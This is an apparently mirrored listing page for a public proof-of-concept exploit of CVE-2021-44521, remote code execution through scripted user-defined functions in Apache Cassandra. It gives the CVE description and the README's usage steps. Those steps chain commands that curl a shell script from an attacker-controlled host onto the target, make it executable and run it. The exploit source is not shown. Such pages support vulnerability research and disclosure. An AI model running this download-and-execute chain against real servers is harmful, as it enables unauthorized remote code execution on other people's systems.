CVE-2021-44521 PoC — Remote code execution for scripted UDFs

Source

https://github.com/WoodenKlaas/CVE-2021-44521

Associated Vulnerability

Title:Remote code execution for scripted UDFs (CVE-2021-44521)
Description:When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.

Description

Automated PoC of CVE-2021-44521

Readme

# CVE-2021-44521
Automated PoC of CVE-2021-44521
Credits to original poc: https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
# Requirements
Cassandra-driver
```bash
pip3 install cassandra-driver
```
# Usage
```bash
python3 poc.py <ip> <cmd>
```
Note that you can't do more command at a time, neither use pipes as of yet.
So run 
```bash
pyhon3 poc.py <ip> "curl http://<your-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"
```

File Snapshot


 [4.0K]  /data/pocs/6743eefaa24e1cb623287a1d6b8a6320918afc46
├── [1.7K]  poc.py
└── [ 556]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!